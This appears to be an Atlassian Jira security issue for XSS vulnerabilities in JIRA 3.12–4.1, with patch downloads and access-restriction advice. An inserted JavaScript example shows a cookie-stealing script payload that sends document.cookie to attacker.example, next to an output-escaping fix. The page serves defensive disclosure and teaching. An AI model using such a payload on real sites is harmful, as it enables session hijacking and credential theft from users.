Jira Data Center: JRASERVER-20994

XSS Vulnerabilities in JIRA


    • Type: Bug
    • Resolution: Fixed
    • Priority: Highest
    • Fix Version/s: 4.1.1, 4.2
    • Affects Version/s: 3.12, 3.12.1, 3.12.2, 3.12.3, 3.13, 3.13.1, 3.13.2, 3.13.3, 3.13.4, 3.13.5, 4.0, 4.0.1, 4.0.2, 4.1
    • Component/s: None

      Warning: This issue is superseded by JRA-21004. Please install the patches on that issue rather than the ones attached here.

      For more details, see JIRA Security Advisory - 2010-04-16.

      The security advisory also explains how to determine whether your JIRA installation has been compromised, and includes an addendum on good system administration practices for protecting a publicly accessible JIRA installation. These additions are valuable even if you cannot apply the patch immediately.

      If you have already installed this patch, install JRA-21004 on top of this patch.

      We have identified vulnerabilities in JIRA that allow an attacker to carry out cross-site scripting (XSS) attacks against JIRA. Attacks made possible by these vulnerabilities include:

      • An attacker could exploit the vulnerability to steal other users' session cookies or other credentials, by having the injected script send them to a web server the attacker controls.
      • An attacker's text and script could be shown to other users viewing the JIRA page and run in their browsers.

      You can read more about XSS attacks at cgisecurity, CERT and other places on the web.
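
The following is an added example, not code from this issue or from JIRA itself, showing the mechanism behind the cookie-theft scenario above and the class of fix (encoding user-controlled text on output). The field name "summary", the attacker host attacker.example and the rendering helpers are assumptions for illustration only; they do not describe the actual vulnerable JIRA pages, which this issue does not identify.

```javascript
// Added example (not Atlassian's code). The rendering helpers, the field
// name "summary" and the host attacker.example are assumptions for
// illustration; they are not JIRA's templates.

// Constructed attacker payload of the kind the advisory describes: when it
// runs in a victim's browser it sends the victim's cookies to the attacker.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'" +
  "+encodeURIComponent(document.cookie)</script>";

// Vulnerable rendering: user-controlled text is concatenated straight into
// HTML, so the <script> tag lands in the page and executes for every viewer.
function renderVulnerable(value) {
  return `<td class="summary">${value}</td>`;
}

// Minimal HTML entity encoder, safe for text placed inside element content
// or inside a double-quoted attribute value. Order matters: '&' first, so
// the entities produced by the later replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: encode at the point the value enters the HTML.
// The browser then displays the payload as literal text instead of
// parsing it as markup.
function renderEscaped(value) {
  return `<td class="summary">${escapeHtml(value)}</td>`;
}

// Crude check used only to show the difference between the two renderings:
// does the markup still contain a live <script> tag? Not a general detector.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Runs both renderings against the payload and reports which still carries
// an executable tag. Expected: { vulnerable: true, escaped: false }.
function demo() {
  return {
    vulnerable: containsScriptTag(renderVulnerable(PAYLOAD)),
    escaped: containsScriptTag(renderEscaped(PAYLOAD)),
  };
}

console.log(demo());
```

Output encoding at every place user-supplied text is written into a page is the structural fix that a patch for this class of bug applies. Marking the session cookie HttpOnly removes it from `document.cookie` and so blunts this particular exfiltration, but it does not stop an injected script from acting inside the application on the victim's behalf, so it is a defence-in-depth measure, not a substitute for patching.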

      We recommend that you apply the attached patch immediately to address these vulnerabilities.
      Instructions for applying the patch are contained in the README file inside the attached zip. Please download the patch that matches your version of JIRA; these patches have only been tested on the point releases named in the zip filenames. If you are not on the point release that a patch was created for, it is recommended that you first upgrade to the latest point release for your version of JIRA before applying the patch.

      Alternatively, if you are not in a position to do this immediately and you judge it necessary, you could disable public access to JIRA (for example, by removing the relevant global or project-specific 'Anyone' permissions and changing JIRA's mode to disable public signup) until you have applied the necessary patches. For even tighter control, you could restrict access to trusted groups.

      If you are applying this patch, we also recommend you apply the patch for JRA-20995.

        1. patch-JRA-20994-3_12_3.zip
          18 kB
        2. patch-JRA-20994-3_13_4.zip
          18 kB
        3. patch-JRA-20994-3_13_5.zip
          19 kB
        4. patch-JRA-20994-4_0_2.zip
          21 kB
        5. patch-JRA-20994-4_1.zip
          24 kB

            Assignee: Unassigned
            Reporter: edwin (edwin@atlassian.com)
            Votes: 3
            Watchers: 24